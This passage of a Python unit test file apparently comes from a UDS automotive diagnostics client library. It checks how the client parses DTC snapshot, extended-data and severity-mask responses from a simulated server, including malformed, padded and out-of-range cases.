self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25\x01')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25\x01\x67')
def test_invalid_length_missing_did_exception(self):
self.invalid_length_missing_did_server_task()
def _test_invalid_length_missing_did_exception(self):
for i in xrange(4):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xFF)
def test_invalid_length_missing_did_no_exception(self):
self.invalid_length_missing_did_server_task()
def _test_invalid_length_missing_did_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(4):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xFF)
self.assertFalse(response.valid)
def invalid_length_missing_data_server_task(self):
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25\x01\x67\x89')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25\x01\x67\x89\x99')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25\x01\x67\x89\x99\x88')
def test_invalid_length_missing_data_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_exception(self):
for i in xrange(8):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xff)
def test_invalid_length_missing_data_no_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(8):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xff)
self.assertFalse(response.valid)
def test_bad_subfunction_exception(self):
self.wait_request_and_respond('\x59\x06\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_bad_subfunction_no_exception(self):
self.wait_request_and_respond('\x59\x06\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_record_number_exception(self):
self.wait_request_and_respond('\x59\x05\x03\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_record_number_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_bad_record_number_no_exception(self):
self.wait_request_and_respond('\x59\x05\x03\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_record_number_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_no_record(self):
self.wait_request_and_respond('\x59\x05\x02')
def _test_no_record(self):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertEqual(len(response.service_data.dtcs), 0)
self.assertEqual(response.service_data.dtc_count, 0)
def test_no_record_zero_padding_ok(self):
data = '\x59\x05\x02'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_ok(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(8):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertEqual(len(response.service_data.dtcs), 0)
self.assertEqual(response.service_data.dtc_count, 0)
def test_no_record_zero_padding_not_ok_exception(self):
data = '\x59\x05\x02'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_not_ok_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_no_record_zero_padding_not_ok_no_exception(self):
data = '\x59\x05\x02'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_not_ok_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertFalse(response.valid)
def test_oob_values(self):
pass
def _test_oob_values(self):
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=-1)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x100)
class GenericReportExtendedDataByRecordNumber(object):
def __init__(self, subfunction, client_function):
self.sb = struct.pack(u'B', subfunction)
self.badsb = struct.pack(u'B', subfunction+1)
self.client_function = client_function
def assert_single_data_response(self, response):
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x20)
self.assertEqual(len(dtc.extended_data), 1)
extended_data = dtc.extended_data[0]
self.assertTrue(isinstance(extended_data, Dtc.ExtendedData))
self.assertEqual(extended_data.record_number, 0x99)
self.assertEqual(extended_data.raw_data, '\x01\x02\x03\x04\x05')
def test_single_data(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, '\x19' + self.sb + '\x12\x34\x56\x99')
self.conn.fromuserqueue.put('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05')
def _test_single_data(self):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99, data_size=5)
self.assert_single_data_response(response)
def test_single_data_instance_param(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, '\x19' + self.sb + '\x12\x34\x56\x99')
self.conn.fromuserqueue.put('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05')
def _test_single_data_instance_param(self):
response = getattr(self.udsclient, self.client_function).__call__(dtc=Dtc(0x123456), record_number=0x99, data_size=5)
self.assert_single_data_response(response)
def test_single_data_config_size(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05')
def _test_single_data_config_size(self):
self.udsclient.config[u'extended_data_size'] = {0x123456 : 5}
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99)
self.assert_single_data_response(response)
def test_single_data_zeropadding_ok(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_data_zeropadding_ok(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(8):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99, data_size=5)
self.assert_single_data_response(response)
def test_single_data_zeropadding_notok_exception(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_data_zeropadding_notok_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99, data_size=5)
def test_single_data_zeropadding_notok_no_exception(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_data_zeropadding_notok_no_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(8):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99, data_size=5)
self.assertFalse(response.valid)
def test_double_data(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x10\x01\x02\x03\x11\x04\x05\x06')
def _test_double_data(self):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x20)
self.assertEqual(len(dtc.extended_data), 2)
self.assertTrue(isinstance(dtc.extended_data[0], Dtc.ExtendedData))
self.assertEqual(dtc.extended_data[0].record_number, 0x10)
self.assertEqual(dtc.extended_data[0].raw_data, '\x01\x02\x03')
self.assertTrue(isinstance(dtc.extended_data[1], Dtc.ExtendedData))
self.assertEqual(dtc.extended_data[1].record_number, 0x11)
self.assertEqual(dtc.extended_data[1].raw_data, '\x04\x05\x06')
def test_no_data(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20')
def _test_no_data(self):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x20)
self.assertEqual(len(dtc.extended_data), 0)
def test_no_data_zeropadding_ok(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1) )
def _test_no_data_zeropadding_ok(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(8):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x20)
self.assertEqual(len(dtc.extended_data), 0)
def test_no_data_zeropadding_not_ok_exception(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1) )
def _test_no_data_zeropadding_not_ok_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3)
def test_no_data_zeropadding_not_ok_no_exception(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1) )
def _test_no_data_zeropadding_not_ok_no_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(8):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3)
self.assertFalse(response.valid)
def invalid_length_no_response_server_task(self):
self.wait_request_and_respond('')
self.wait_request_and_respond('\x59')
def test_invalid_length_no_response_exception(self):
self.invalid_length_no_response_server_task()
def _test_invalid_length_no_response_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_invalid_length_no_response_no_exception(self):
self.invalid_length_no_response_server_task()
def _test_invalid_length_no_response_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(2):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertFalse(response.valid)
def invalid_length_incomplete_dtc_server_task(self):
self.wait_request_and_respond('\x59' + self.sb)
self.wait_request_and_respond('\x59' + self.sb + '\x12')
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34')
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56')
def test_invalid_length_incomplete_dtc_exception(self):
self.invalid_length_incomplete_dtc_server_task()
def _test_invalid_length_incomplete_dtc_exception(self):
for i in xrange(4):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_invalid_length_incomplete_dtc_no_exception(self):
self.invalid_length_incomplete_dtc_server_task()
def _test_invalid_length_incomplete_dtc_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(4):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertFalse(response.valid)
def invalid_length_missing_data_server_task(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99')
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01')
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02')
def test_invalid_length_missing_data_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_exception(self):
for i in xrange(3):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_invalid_length_missing_data_no_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(3):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertFalse(response.valid)
def test_wrong_subfn_response_exception(self):
self.wait_request_and_respond('\x59' + self.badsb + '\x12\x34\x56\x20\x99\x01\x02\x03')
def _test_wrong_subfn_response_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_wrong_subfn_response_no_exception(self):
self.wait_request_and_respond('\x59' + self.badsb + '\x12\x34\x56\x20\x99\x01\x02\x03')
def _test_wrong_subfn_response_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_wrong_record_number_response_exception(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x98\x01\x02\x03')
def _test_wrong_record_number_response_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_wrong_record_number_response_no_exception(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x98\x01\x02\x03')
def _test_wrong_record_number_response_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_wrong_service_response_exception(self):
self.wait_request_and_respond('\x6F' + self.sb + '\x12\x34\x56\x20\x98\x01\x02\x03')
def _test_wrong_service_response_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_wrong_service_response_no_exception(self):
self.wait_request_and_respond('\x6F' + self.sb + '\x12\x34\x56\x20\x98\x01\x02\x03')
def _test_wrong_service_response_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_oob_values(self):
pass
def _test_oob_values(self):
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(dtc=-1, data_size=3, record_number=0x99)
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(dtc=0x1000000, data_size=3, record_number=0x99)
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=-1)
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x100)
def test_oob_values_data_size(self): # validation is made at interpret_response
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03')
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03')
def _test_oob_values_data_size(self):
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=-1, record_number=0x99)
with self.assertRaises(ValueError):
self.udsclient.config[u'extended_data_size'] = {0x123456 : -1}
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99)
class TestReportDTCExtendedDataRecordByDTCNumber(ClientServerTest, GenericReportExtendedDataByRecordNumber): # Subfn = 0x6
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericReportExtendedDataByRecordNumber.__init__(self, subfunction=0x06, client_function = u'get_dtc_extended_data_by_dtc_number')
class TestReportNumberOfDTCBySeverityMaskRecord(ClientServerTest): # Subfn = 0x7
def test_normal_behaviour_param_int(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x07\xC0\x01")
self.conn.fromuserqueue.put("\x59\x07\xFB\x01\x12\x34")
def _test_normal_behaviour_param_int(self):
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_normal_behaviour_param_instance(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x07\xC0\x01")
self.conn.fromuserqueue.put("\x59\x07\xFB\x01\x12\x34")
def _test_normal_behaviour_param_instance(self):
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = Dtc.Status(test_failed=True), severity_mask=Dtc.Severity(check_immediately=True, check_at_next_exit=True))
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_normal_behaviour_harmless_extra_byte(self):
self.wait_request_and_respond("\x59\x07\xFB\x01\x12\x34\x00\x11\x22")
def _test_normal_behaviour_harmless_extra_byte(self):
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_bad_response_subfn_exception(self):
self.wait_request_and_respond("\x59\x08\xFB\x01\x12\x34")
def _test_bad_response_subfn_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_bad_response_subfn_no_exception(self):
self.wait_request_and_respond("\x59\x08\xFB\x01\x12\x34")
def _test_bad_response_subfn_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F\x07\xFB\x01\x12\x34")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F\x07\xFB\x01\x12\x34")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def bad_length_response_server_task(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59\x07")
self.wait_request_and_respond("\x59\x07\xFB")
self.wait_request_and_respond("\x59\x07\xFB\x01")
self.wait_request_and_respond("\x59\x07\xFB\x01\x12")
def test_bad_length_response_exception(self):
self.bad_length_response_server_task()
def _test_bad_length_response_exception(self):
for i in xrange(5):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_bad_length_response_no_exception(self):
self.bad_length_response_server_task()
def _test_bad_length_response_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(5):
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertFalse(response.valid)
def test_oob_value(self):
pass
def _test_oob_value(self):
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x100, severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = -1, severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = u'a', severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0x100)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=-1)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=u'a')
class TestReportDTCBySeverityMaskRecord(ClientServerTest): # Subfn = 0x8
def client_assert_response(self, response, expect_all_zero_third_dtc=False):
self.assertEqual(response.service_data.status_availability.get_byte_as_int(), 0xFB)
number_of_dtc = 3 if expect_all_zero_third_dtc else 2
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x20)
self.assertEqual(response.service_data.dtcs[0].severity.get_byte_as_int(), 0x80)
self.assertEqual(response.service_data.dtcs[0].functional_unit, 0x99)
self.assertEqual(response.service_data.dtcs[1].id, 0x123457)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x60)
self.assertEqual(response.service_data.dtcs[1].severity.get_byte_as_int(), 0x40)
self.assertEqual(response.service_data.dtcs[1].functional_unit, 0x88)
if expect_all_zero_third_dtc:
self.assertEqual(response.service_data.dtcs[2].id, 0)
self.assertEqual(response.service_data.dtcs[2].status.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[2].severity.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[2].functional_unit, 0x00)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x08\xC0\x01")
self.conn.fromuserqueue.put("\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60")
def _test_normal_behaviour(self):
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.client_assert_response(response)
def test_normal_behaviour_param_instance(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x08\xC0\x01")
self.conn.fromuserqueue.put("\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60")
def _test_normal_behaviour_param_instance(self):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = Dtc.Status(test_failed=True), severity_mask=Dtc.Severity(check_immediately=True, check_at_next_exit=True))
def test_dtc_duplicate(self):
self.wait_request_and_respond('\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x56\x60')
def _test_dtc_duplicate(self):
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertEqual(len(response.service_data.dtcs), 2) # We want both of them. Server should avoid duplicate
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x20)
self.assertEqual(response.service_data.dtcs[0].severity.get_byte_as_int(), 0x80)
self.assertEqual(response.service_data.dtcs[0].functional_unit, 0x99)
self.assertEqual(response.service_data.dtcs[1].id, 0x123456)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x60)
self.assertEqual(response.service_data.dtcs[1].severity.get_byte_as_int(), 0x40)
self.assertEqual(response.service_data.dtcs[1].functional_unit, 0x88)
def test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
data = '\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = True
for i in xrange(7):
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.client_assert_response(response, expect_all_zero_third_dtc=False)
def test_normal_behaviour_zeropadding_ok_consider_allzero(self):
data = '\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = False
expect_all_zero_third_dtc_values = [False, False,False,False,False,True,True ]
for i in xrange(7):
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero(self):
data = '\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
should_return_invalid = [True, True, True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, None, None, False, None]
for i in xrange(7):
if should_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
else:
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero(self):
data = '\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
should_return_invalid = [True, True, True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, None, None, True, None]
for i in xrange(7):
if should_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
else:
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_no_dtc(self):
self.wait_request_and_respond('\x59\x08\xFB')
def _test_no_dtc(self):
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertEqual(len(response.service_data.dtcs), 0)
def test_bad_response_subfunction(self):
self.wait_request_and_respond('\x59\x09\xFB')
def _test_bad_response_subfunction(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_bad_response_service(self):
self.wait_request_and_respond('\x6F\x08\xFB')
def _test_bad_response_service(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_bad_response_length(self):
self.wait_request_and_respond('\x59')
self.wait_request_and_respond('\x59\x08')
def _test_bad_response_length(self):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_oob_value(self):
pass
def _test_oob_value(self):
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x100, severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = -1, severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = u'aaa', severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0x100)
with self.assertRaises(ValueError):
